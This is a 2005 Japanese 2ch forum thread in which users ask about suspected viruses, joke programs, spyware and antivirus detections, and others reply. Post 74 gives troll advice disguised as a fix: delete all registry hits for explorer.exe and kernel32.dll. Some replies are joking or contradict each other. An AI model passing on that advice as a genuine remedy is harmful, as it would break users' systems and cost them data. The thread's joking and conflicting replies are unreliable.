69 名前：63 mailto:sage [2005/03/24(木) 19:11:51 ]: >65さん　レスありがとうございます
「・・・・32dll・・なんたらかんたら」のなんたらかんたらを書け。
について
「Generic Host Process for win32 Services」はエラーが発生し
閉じられる必要がありました　マイクロソフトに送信しますか？
が正確な内容です

あーそういえばフォント３つほどDLして入れました
ぐぐってみます
ありがとうございました
70 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 19:34:28 ]: >>63
フォントキャッシュでぐぐるついでにGeneric Host Process for win32 Servicesでもぐぐってみ。
それで自分に該当しそうな所を見る。
セキュリティソフト関連かドライバー関連かって感じだな。

つーかエラーメッセージがわかってるならまずぐぐるが先決。
それがお前の血となり肉となるｗ
71 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 20:35:20 ]: これって
syobon.com/upload/src/syobon22628.zip.html
ウィルスですか？
このファイルダウンロードして2ｃｈ女神拾い物リンク集.exe
ってファイルダブルクリックしたら
ハードディスク初期化準備中ってでて
キャンセルしようとするとIDとパスワードもとめられたので
しらないので閉じようとしても閉じれないので
強制終了しようとしたら
「失敗したので終了します」って出て閉じたのですが
そしてしっぱいしたんですが・・・・
不安で仕方ないので誰かこの詳細を教えてください
72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 20:55:03 ]: >71
てめぇ！！！！とんでもねーもんイチイチ貼るなよ！
73 名前：71 mailto:sage [2005/03/24(木) 20:57:47 ]: っえ？
いったいなんだったの？
74 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 21:07:31 ]: そんなに心配なら“アレ”やってみるか？>>71

パソコンのトラブル解消法という奴で初心者でも簡単にできる。
レジストリエディタというアプリケーションを開いて、
Windowsの起動に必要な、explorer.exeとkernel32.dllを検索して
ヒットしたものを全部消して行って、再起動するっていうやつを。
75 名前：71 mailto:sage [2005/03/24(木) 21:09:35 ]: 再起動できなくなるだろ？
76 名前：名無しさん＠お腹いっぱい。 [2005/03/24(木) 21:14:50 ]: ここのHPにはいるとブラウザが無駄にでてきて外国語ばっかでびびってるんですが、
もしかしてウイルスやスパイウェアに感染したのでしょうか？
tech.millto.net/~j-maki/novita/
77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 21:17:17 ]: >>75
再起動できなくなるから、リカバリーディスクを用いて
システムリカバリーを行なえば・・・ほうら！
完璧症状が無くなります。
大事なデータも一緒に。
78 名前：71 mailto:sage [2005/03/24(木) 21:20:20 ]: 実際のところ何か分かる人います?
79 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 21:39:38 ]: >>78
ジョークソフト。なんにもおきてないよ。
80 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 21:41:15 ]: ここは鑑定スレじゃねぇ。

それから直リン貼るな
81 名前：71 mailto:sage [2005/03/24(木) 21:41:22 ]: ほんとですか・・・
ありがとうございます
スレ汚してしまい申し訳ありません
たちの悪いジョークソフトですね
結構神経質なんでこういうの弱いんです
ありがとうございました
82 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 21:42:53 ]: >>79
直リン＆スレ違い＆マルチな>>71にはレス不要
83 名前：71 mailto:sage [2005/03/24(木) 21:44:03 ]: ホントすいませんでした
84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 23:41:16 ]: exe拾って疑いも無く実効しておいて神経質とはコレ如何に
85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/25(金) 01:20:02 ]: 健康のために毎日の運動を欠かさないその一方で
風呂上がりのビールが大好き（心臓への負担大）みたいなもんか
86 名前：助けて！！ [2005/03/25(金) 22:15:34 ]: アダルトサイト回ってたら感染してしまいました。
デスクトップが全部消え壁紙も変わりました。真っ赤な背景に　DANGER　SPAYWARE　と出ます。

124498.exeというのがどうやら悪さしているのですが、windowsフォルダにいるやつを消しても復活してきます。

googleで検索したら外国サイトにひっかかりましたが、何語かも分からず苦戦しています。
www.google.co.jp/search?hl=ja&q=124498.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

どなたか助けてください！！
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/25(金) 22:30:05 ]: >>86
まず、

エロサイト見たら…助けて下さい！Part52
pc8.2ch.net/test/read.cgi/pcqa/1111405528/

こっち行け
88 名前：名無しさん＠お腹いっぱい。 [2005/03/26(土) 00:43:08 ]: 【動機は】雑音犬畜生Part28【何？】
tmp4.2ch.net/test/read.cgi/tubo/1107679450/
89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/26(土) 15:05:51 ]: 再インストールに際しての質問なんですけど
ネットワークを介して感染するウィルスって
Sasser（とその亜種）MS_ブラスター（とその亜種）以外に
何かありましたっけか？？
90 名前：名無しさん＠お腹いっぱい。 [2005/03/27(日) 13:06:06 ]: Mydoom
Netsky
91 名前：名無しさん＠お腹いっぱい。 [2005/03/27(日) 14:05:40 ]: ほかにもたくさんありすぎ
XPならファイアウォールをオンにしてアップデートすべし！
92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/27(日) 14:21:46 ]: 先ほどからスクリーンショットが自動的に5分に1回のペースで撮られています。
ウィルスバスターオンラインスキャンで全てのファイルを検索しましたが、検出されませんでした。
アイコン絵がフォルダに偽装されたexeファイルも開いていません。
これはウィルスじゃないと見てもOKでしょうか。
OSはWindowsXP SP1です。
93 名前：名無しさん＠お腹いっぱい。 [2005/03/27(日) 14:47:06 ]: >>92
スクリーンショットが撮られてるとなぜ分かる？
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/27(日) 16:14:21 ]: >93
通常画面ではわからないものの、スクリーンショットを取った場合
その画面を保存するゲームで定期的に保存されているためです。
95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/27(日) 19:05:06 ]: ウィルスつくってばらまいている人が逮捕された話ってほとんど聞きませんよね？
ウィルスばらまきはやったもん勝ち？
なんで捕まえられないの？
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/27(日) 19:36:52 ]: >>95
アメリカではEXCELのマクロウィルスばらまいた子供が逮捕されて、
6000万円の賠償させられてますよ。親は破産だそうですから、
払ってないんでしょうけど。
他にも何人か居ますけど、どれもアメリカですね。
特に、アングラサイトやニュースグループでやりとりしてて、
あれはオレだとかいう自慢をしてしまって、そこを張ってる
警察に家捜しされてアボーンが多いですね。
日本だとちょっと難しい捜査方法でしょうけど。
97 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 08:22:10 ]: ウィルスかなんか知らないけど、プログラムが全部消えた…
後に残ったのはゴミ箱とフォルダのみ
マイコンピュータとかも消えた…

ウィルスに偽装表示されてるのか？

ログイン画面はチェス
nyやってて引っ張ってきちゃいますた

どうすれば直る？
98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 08:34:50 ]: >>97
あー、オレもなった。Luzhin Defence virus?とかいうチェスプログラム？のはず。
ｵﾌｨｽのｲﾝｽﾄｰﾗｰに偽装してあって、ものの見事にやられた。
圧縮ファイルとかにも感染してるし、酷いことになってた。
99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 08:44:57 ]: 直りますたか？

漏れはnyのクラックに偽装されててハマッタ…

リカバリーディスクもないしどうすれば…
100 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 09:13:56 ]: >>99
復元オプションで戻したら、一応あがるようにはなったけど、
かなり動きはおかしかった。あきらめてバックアップから戻したヨ！
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 09:28:30 ]: >>100
復元オプション？
やり方分からないです…

実家のＰＣだからヤバイ

買ったトコで直してくれるかなぁ？
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 10:06:41 ]: ny関連はダウンロード板tmp4.2ch.net/download/でやってくれ
103 名前：名無しさん＠お腹いっぱい。 [2005/03/28(月) 12:51:34 ]: age
104 名前：名無しさん＠お腹いっぱい。 [2005/03/28(月) 15:13:52 ]: 教えてください。
ノートンやバスターなどのアンチウィルスのスキャンも
spybotなどと同様、セーフモードでのスキャンの方がいいのでしょうか？
105 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 15:32:15 ]: 　　（　＾ω＾）　・・・
　　（⊃⊂）

　⊂（＾ω＾）⊃　セフセフ!!!　
　　ミ⊃⊂彡
106 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 15:32:33 ]: >>104
とくにセーフモードでやれと推奨されてないから気にしなくていい。
ただし、スキャン中に他の作業をすることは推奨されてない。
だから、PC使ってない夜中とかにスキャンさせればよろしいかと。
107 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 16:32:00 ]: いや、起動しているとスキャンから身を隠すウィルスがいるのも事実
出来ればたまにセーフモードでスキャンした方が好ましい
108 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 17:51:39 ]: 104です。

セーフモードでのスキャンにこだわる程の必要性はないけど
ある程度のスパンで定期的にやっておいて損はなさそうですね。
㌧ｸｽでした。
109 名前：名無しさん＠お腹いっぱい。 [2005/03/28(月) 18:20:14 ]: Bloodhound.Exploit.6 というウイルスが検出されたのですがこれは何ですか？
あとこれを削除するにはどうすればいいですか？
110 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 18:23:41 ]: >>109
　　　　　　_______　　　　　　　　　　　　　　　　　　　　　_＿
　　　　／／￣~`i ゝ　　　　　　　　　　　　　　　　　 `l |
　　　 / /　　　　　　　 ,______　　　,_____　　　　________　 | |　　____　TM
　　　|　|　　　＿__　//￣ヽヽ　//￣ヽヽ　（（￣））　 | |　//￣_>>
　　　＼ヽ、　　｜l　| |　　 | |　| |　　 | |　　``( (.　　.| |　| | ~~
　　　　 `、二===-'　 ` ===' '　　` ===' '　 //￣ヽヽ　|__ゝヽ二=''
　　　　　　　　　　　　　　　　　　　　　　　ヽヽ___//　　　日本
　　＿＿＿＿＿　＿＿＿＿＿　＿＿＿＿＿_ 　＿_＿＿＿＿＿
　　|　ウェブ　|　|　イメージ　|　|　グループ　|　|　ディレクトリ　|
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　 .＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　｜　Bloodhound.Exploit.6　　　　　　　　　　　|・検索オプション
　　　　　　└────────────────┘・表示設定
　　　　　　　　| Google検索　|　I'm Feeling Lucky　|　　・言語ツール
　　　　　　　　￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　○ウェブ全体から検索 ◎日本語のページを検索
111 名前：名無しさん＠お腹いっぱい。 [2005/03/28(月) 18:28:50 ]: >>110
有難うございます(´・ω・`)
112 名前：109 mailto:sage [2005/03/28(月) 21:11:27 ]: 109でございます。他スレで質問することにします。
どうも有り難うございました。
113 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 21:22:03 ]: 他スレの状況みてると、>>110氏の回答は非常に適切だったな。
114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/28(月) 21:28:16 ]: >>113
禿げあがる程に同意
答えるやつも質問者が自分で覚えるような形でやってやらないと意味ないよな
115 名前：109 mailto:sage [2005/03/28(月) 21:31:06 ]: すいません。必死で勉強します。
116 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 10:29:03 ]: age
117 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 15:40:50 ]: 【使用OS】win XP
【WindowsUpdateしてるか】あまりしていない
【AntiVirusは何を使っているか】Norton
【ちゃんとUpdateしてるか】あまりしていない
【スキャンした結果（ウイルス名・発見場所）】スキャンではひっかから
なかったが、侵入時に感染したという表示が出た。
また、antivirusのログを見たら「Download.Trojan」「Bloodhound.Exploit.6」
が症状の発生する直前に感染していたことが判明。
【別のオンラインスキャンしたならその結果は】 trendmicro→検出なし
【症状を具体的に、分かる限りすべて書く】
ブラウザ（IE 6.0）でサイトを閲覧していると、最初は普通に表示されるが
ある時を境にjpg,gifを全く表示しなくなる（ステータスバーに「残り○○項目」と
表示され続ける）。これは、ブラウザを一回閉じてまた開くと一時的に元に戻る。
【何をしたらそんなことになったのか】 2ｃｈでリンクを踏んだ時に
antivirusが反応した。その時全て「遮断」を選択した。
【これまでにとった措置】
１．internet securityを無効に→意味なし
２．システム復元→意味なし

よろしくお願いします。。。
118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 15:45:11 ]: >>117
まったく問題ありません。イタズラに反応しただけです。
119 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 15:45:26 ]: >>117
ノートントラップじゃないの?
120 名前：117 [2005/03/29(火) 15:49:15 ]: >>118
>>119
返答ありがとうございます。
jpgなどを表示してくれないのでインターネットを使う際にかなりの
支障があります。ウイルスとの因果関係は分かりませんが、時期的に
完全にかぶるので質問させていただきました。
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 15:51:49 ]: >>120
それはウィルスではなくて、ＩＥの不具合です。
122 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 15:51:50 ]: 【WindowsUpdateしてるか】あまりしていない
【ちゃんとUpdateしてるか】あまりしていない

この時点で答えてやる必要はないのではないか？
じゃあ次からはちゃんとしておけよ、ってことぐらいしか言えないだろ。
123 名前：117 [2005/03/29(火) 15:54:08 ]: >>121
ウイルスとは関係ないんですか、、、ありがとうございます。

>>122
実際そういわれたら何の反論もできないですね。
次からはちゃんとしますが。
124 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 16:00:21 ]: foffo-gunkanmaki.hp.infoseek.co.jp/url--uploader.html
ここのasongfor.s13.xrea.com/x/up/files/なんたらを踏んでしまいました。
ホームページが固定されてしまったのでエロページの対処法というのを
見てみたのですがCW Shredderとやらは何度起動してremovedになっても
時間が立つとまた再生され、Windows SyncroAdというアプリも
見つかりませんし、HiJack Thisで大量に出るログもほとんど別物でさっぱりわかりません。
desktopにおいてあったファイルが消えて（HD容量は減っていないので削除ではない？）
desktop画面はDANGER:SPYWAREとかいうhtmlに固定されてしまいました。
今も色々試してますがさっぱりです。
125 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 16:02:38 ]: >>124
ewido使え
126 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 16:38:30 ]: 直リン貼るバカにはスルーという名のおもてなし
127 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 17:29:55 ]: テンプレも読まず
自分のケツも拭えず
他人への気遣いもわからず

わたしはこんな人間になりたい

とは思わない
128 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 17:32:23 ]: (´･ω･`)
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 20:22:37 ]: ＡＤＳＬからケーブルに変えたら３０分毎ぐらいに
ネットワークウイルス攻撃警告が出るよん。(´･ω･`)
130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 20:26:02 ]: >>129
ブロードキャストパケットの警告を無視しるように定義しる！
131 名前：１２９ mailto:sage [2005/03/29(火) 20:45:54 ]: >>130
うは～ありがとう。(ﾟ∀ﾟ)！
132 名前：名無しさん＠お腹いっぱい。 [2005/03/29(火) 21:14:50 ]: mszx23.exe
drct16.dll

これらはどうすれば削除できるのでしょうか？
133 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/29(火) 23:46:46 ]: >>132
>>1
134 名前：名無しさん＠お腹いっぱい。 [2005/03/30(水) 00:41:06 ]: 要はコレなんですけど
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1279082

デスクトップのフォルダが新たに他のディレクトリに生成されてるのと
画面プロパティがいかれて一切変更できなくなってるのと
アイコン右クリックでメニューが出ないのが治ったら
とりあえずいいです。
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/30(水) 00:57:42 ]: >>134
WindowsのCDを用意して、CD入れて再起動。
CDをファーストブートにして、インスコしなおせ
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/30(水) 01:14:43 ]: >>134
1.システムの復元
2.IE組み込まれたアドオンを直接削除する
XP_SP2なら場所はここ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
3.リカバリー
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/30(水) 19:06:14 ]: ZIPファイルとかMP3ファイルとかのサイズが115kbになってて、
再生とか解凍とかできない状態になるようなウィルスってありますか？
ひさしぶりにPCを起動したらすさまじい被害状況で驚いたんですが。
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/30(水) 19:31:26 ]: >>137
アンチウィニー。オレもやられた。キンタマよりまし
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/30(水) 20:37:59 ]: >>138
サンクス、
ハード的な問題じゃないようなので安心しました。
140 名前：名無しさん＠お腹いっぱい。 [2005/03/31(木) 08:50:29 ]: ラブホ向けコンピューター最大手のアルメックスで、
ネットワークを通じたウィルス感染があって、ホテル側端末も感染
www.almex.jp/

ホテルによっては自動精算機も停止して訴訟問題に発展か？？？
141 名前：名無しさん＠お腹いっぱい。 [2005/03/31(木) 08:55:43 ]: ２００４年版ノートンが更新切れたため、電器屋で、２００５年版ノートンを購入して（特別優待版）
インストールしましたが、更新キーを購入すれと出るので、電器屋に聞いたところ解らないとの事でした
再度更新キーを取得しなきゃならないのですか？教えてください
142 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 10:13:20 ]: >>141
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.62【2005】
pc8.2ch.net/test/read.cgi/sec/1111603203/
143 名前：名無しさん＠お腹いっぱい。 [2005/03/31(木) 10:48:23 ]: すいません質問なんですが
最近パソコンいじってるとたまに
モニタ（画面）に一瞬血しぶきみたいなものが表示されます。
これってウィルスでしょうか？
144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 11:14:14 ]: >>143＞これってウィルスでしょうか？
現象だけでウィルスかどうかは分からない。ウィルススキャンしろ。
145 名前：名無しさん＠お腹いっぱい。 [2005/03/31(木) 11:17:54 ]: Google Error

We're sorry...
... but we can't process your request right now. A computer virus or spyware application is sending us automated requests, and it appears that your computer or network has been infected.

We'll restore your access as quickly as possible, so try again soon. In the meantime, you might want to run a virus checker or spyware remover to make sure that your computer is free of viruses and other spurious software.

We apologize for the inconvenience, and hope we'll see you again on Google.
To continue searching, please type the characters you see below:

グーグルで検索すると、こういう上のようなエラーになります。
ウィルスは、パンダオンラインスキャンでチェックしたけどありませんでした。
スパイのは、Adaware,スパイボットでチェックしました。

なんでもいいので、このエラーについて教えてください。
146 名前：143 [2005/03/31(木) 11:39:51 ]: ウィルススキャンなんてわかりません。
とはいうものの調べてみました。
恐らく症状からみて感染したのはエフバウンドぽいです。
モニタに赤いドットが表示される・・・しかも木曜日にらしい
今ウィルス検出してるけど感染ファイル数200/20000以上突破
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 11:46:30 ]: >>145
検索しなはれ、って言いたいところだが、検索できないんだよなｗ　他の検索エンジンでGoogle Errorで検索汁ｗ
＞ウイルスとかスパイウェアとか、物騒な言葉が並ぶが、要は連続クエリは止めなはれということらしい。
＞で、GoomaniやunDonutによる短時間で数百回のクエリが問題だったのだろう。
＞検索やりすぎに注意！
ttp://www.hyperposition.com/se3blog/google/serps/20050306195250.html
148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 11:47:08 ]: >>146
(・∀・)ｶｴﾚ!
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 11:51:06 ]: このスレ、テンプレにオンラインスキャンのリンクないんだな…
シマンテックセキュリティチェック
www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
www.trendmicro.co.jp/hcall/index.asp

次のテンプレに入れといてくれ。
150 名前：１４５ mailto:sage [2005/03/31(木) 12:30:54 ]: >>147
参考になりました。丁寧にありがとうございました。
151 名前：名無しさん＠お腹いっぱい。 [2005/03/31(木) 17:07:34 ]: パソコンのウイルス対策ソフトPanda Antivirus Platinum
Internet Security 2005をネット上で申し込みましたが、
ダウンロードできません。
www.pandasoftware.com/
パンダ社に２回メールしても返事無し。
一度も使ってないし、返事しないという誠意の無さに返金
するよう　再度メールしても依然返事はありません。
カード会社に上記のことを話し、調査請求しましたが、結果がわかるまで
１～２ヶ月かかるとのこと。
使ってないものの料金を払うのは納得できません。
またＨＰにはドルと記載されていて、請求書にはユーロになって
いるのもおかしい気がします。
国内のことであればまだしも、アメリカの会社なので　どうした
らいいのか困っています。
どなたか教えてください、宜しくお願い申しあげます。
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 17:11:22 ]: >>151
通じる英語で書かないからだと思うよ。あと少し辛抱が足りないかも。
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 17:12:26 ]: >>151
板違いだとおもうが、
国民生活センターや各都道府県の消費生活関係部署に相談したら？
www.kokusen.go.jp/ncac_index.html
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/31(木) 20:38:19 ]: >>146
155 名前：名無しさん＠お腹いっぱい。 [皇紀2665/04/01(金) 06:21:50 ]: 俺にウィルス送って倒すことができたら100万円あげるよ！
spyder_taka@ybb.ne.jp
かかってこい
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 09:42:37 ]: お前終わったな
157 名前：名無しさん＠お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 18:46:35 ]: トレンドマイクロのオンラインスキャンを試してみたのですが検索結果のウィルスの場所の表記が最後まで見えないので場所が解らないのですがどのようにしたら解るようになるのでしょうか？
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 18:58:41 ]: >>157
正式版を買ってください。
159 名前：名無しさん＠お腹いっぱい。 [皇紀2665/04/01(金) 22:29:25 ]: age
160 名前：名無しさん＠お腹いっぱい。 [皇紀2665/04/02(土) 00:12:00 ]: 質問です。

なにかのプロセスがAvastAntiVirusのメールチェッカーを経由し
リモートのSMTP及びPOP3と通信しようして
Outpostに遮断されているのをログで見つけました。

Avastのログを見たのですが、時刻とリモートホストが残っているだけで
どんなプロセスがメールチェッカーを使用したのかは記録されていません。
Avastは常駐監視、加えてNortonでPCの完全スキャンを行いましたが
何も検出しませんでした。

PC上のプロセスを監視して、全てログに書き出すような方法はあるでしょうか？
できればそれをファイアウォールのログと照らし合わせてみたいと思っています。

OSはw2k、IE6です。
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [皇紀2665/04/02(土) 01:39:16 ]: >>157
場所って書かれてるとこの右の黒線にカーソル合わせて右にビーーッってしてみな
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/02(土) 18:45:12 ]: とあるサイトでDLしたゲームの修正パッチ(exeファイル)をクリックしたところ、
「ウイルスの侵入が完了しました」のダイアログが出てパソコンの解像度と色数、
リフレッシュレートが変更されてしまいました！
すぐに元に戻してウイルスバスター2005でフルスキャンしましたがウイルスの感染は無いようでした。
クリックしたプログラム自体もウイルスとは違うようです。
そのプログラムは「W3.0.exe」という名前で144KB、鉄球のようなアイコンをしています。・・・
その他の被害は今のところありませんが、これは一種のジョークプログラムなのでしょうか？
大変不安です。不用意にexeファイルを実行した罰ですね。

【使用OS】　　　　　　　　　　　　　　　　　　　　　　　　　　xp-sp2
【WindowsUpdateしてるか】　　　　　　　　　　　　　　　1日に1度、手動でしています。
【AntiVirusは何を使っているか】　　　　　　　　　　　　ウイルスバスター2005
【ちゃんとUpdateしてるか】　　　　　　　　　　　　　　　　1日2回、手動でしています。
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/02(土) 18:50:04 ]: >>162
そのとあるサイトを教えてください。httpは抜いてお願いします。
164 名前：名無しさん＠お腹いっぱい。 [2005/04/03(日) 02:36:31 ]: JS_PHL.Aウイルスってどんなウイルスですか？
165 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 02:50:02 ]: >>164
>>1,>>7,>>10
166 名前：名無しさん＠お腹いっぱい。 [2005/04/03(日) 04:57:16 ]: PC初心者です。宜しくお願いします。

【使用OS】WIN98SE
【WindowsUpdateしてるか】してます。
【AntiVirusは何を使っているか】 AntiVirusがわかりません。
【ちゃんとUpdateしてるか】　　 AntiVirusがわからない為、していません。　　
【スキャンした結果（ウイルス名・発見場所）】 VBS.LoveLetter.A ・ﾊｰﾄﾞﾃﾞｨｽｸ内

シマンテックのウィルスチェックにて｢VBS.LoveLetter.A｣に感染の表示がでましたが、
PANDAのアクティブスキャンを行った結果、ウィルスは無しでした。
VBS.LoveLetter.Aに感染しているのでしょうか？
感染しているときの対処方法もお願いします。
167 名前：名無しさん＠お腹いっぱい。 [2005/04/03(日) 05:32:51 ]: ネタ乙
168 名前：名無しさん＠お腹いっぱい。 [2005/04/03(日) 05:45:06 ]: >>167

>>166の事ですか？
ネタではないんですけど･･･
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 05:46:09 ]: >>168
心配要りません。どうしても心配なら、ノートンかバスターを買って常駐させてください。
170 名前：１６８ [2005/04/03(日) 05:48:01 ]: 連投ですみません。
>>166＝>>168です。
普段はID表示される板にいますので、気づきませんでした。
171 名前：１６８ [2005/04/03(日) 05:51:53 ]: >>169
ありがとうございます。
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 08:38:49 ]: 近頃、何の前触れも無くフロッピーがアクセスされます。
もしかすると、フロッピーのデーターを持って行くようなウィルスやスパイウェアなんて無いでしょうか？

フロッピーにアクセス
　　　　　↓
　　暗号・圧縮化
　　　　　↓
　　どこかへ転送

重要なメモ（何かのＩＤ・ＰＷ）とかフロッピーにコピーしている人って多いと思うのですが・・・
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 08:40:07 ]: （´・ω・｀）知らんがな
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 08:57:12 ]: つうか、自分で操作するときでも
FDDにアクセスするのに前触れあったらそっちの方が怖いな。
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 13:58:43 ]: >>168
>>7のQ1及びA1を参照
176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 15:21:09 ]: >>172
Dtemp入れてない？
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 23:00:23 ]: Ｊａｎｅ2Ｃｈを見てたら、ノートンがBloodhound.Exploit.6　のウイルスを検出しました。
修復できません　とでたのですが・・・・。
これって　ウイルスに感染しているのでしょうか？
初心者でよく分からないので、よろしくお願いします。
178 名前：プロフェッショナル ◆XPWYkecdOw mailto:sage [2005/04/03(日) 23:04:58 ]: >>177
ウィルスではないよ。ノートントラップ。
なんてデマを書き込んで初心者を騙す人がいますが、
これはウイルスに感染してます。
すぐに、インターネット接続のケーブルを抜いて、
全ファイルスキャンをしてください。そういしないと
勝手にメールを送ったり、状況が悪化します。
179 名前：177 mailto:sage [2005/04/03(日) 23:11:05 ]: ありがとうございます。
参考にします。
180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/03(日) 23:38:38 ]: >>177
マルチは氏ね
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 00:06:03 ]: >>177
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.nibu.d.html
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 00:48:59 ]: >>177
pc8.2ch.net/test/read.cgi/pcqa/1112313860/

このスレのと同じなら問題なし。
183 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 01:29:41 ]: おきに入りに２ちゃんねるを登録しています。
1週間前位、お気に入りから２ちゃんねるを開こうとしたら、いつも見慣れている２ちゃんねるの画面じゃなく、うよく関係の変なページに行ったんだが・・
今は、もう直ったからいいけど・・俺だけか？それともみんななっていたの？
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 01:38:55 ]: 真っ黒なページ？
185 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 01:52:26 ]: >>183
1週間前かい？4/1に4月馬鹿でそういう表示にはなったけどね｡
そのページの上のリンクから入れたんだけど。
186 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 01:52:31 ]: なんか、日本の国旗の写真や共産や天皇とかとにかく恐かったのだよ・・
ウィルスですか？
セキュリティーソフトは、入れていません。
187 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 01:56:33 ]: ＞＞１８５
そうなの？セキュリティーソフト無しでやっていたから、おかしくなったかとおもいました。
ありがとう。
188 名前：　 mailto:sage [2005/04/04(月) 02:10:00 ]: 音楽が流れるようなサイトを開いているわけでもないのに、
ズンチャカ♪ズンチャカ♪と音楽が突然流れてきて、最後にガシャーンって
いって止まると言う事が何回かあったのですが、これってｳｲﾙｽの類ですか?
189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 02:43:19 ]: system32の中にmsencodedrv.exeってのが入ってるのですが
Kerioにそのファイルの接続の許可を求められました。
それ自体は遮断したのですがmsencodedrv.exeがやたらとCPUを食います。
ググッてもファイル名が出なかったのでウィルスかどうか分からないのですがお答えお願いします。
仕様OSはXPでSP2入れてません。
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 03:32:37 ]: >>189
名前からしてMS製っぽいファイルだけど、接続先はどこだったの？
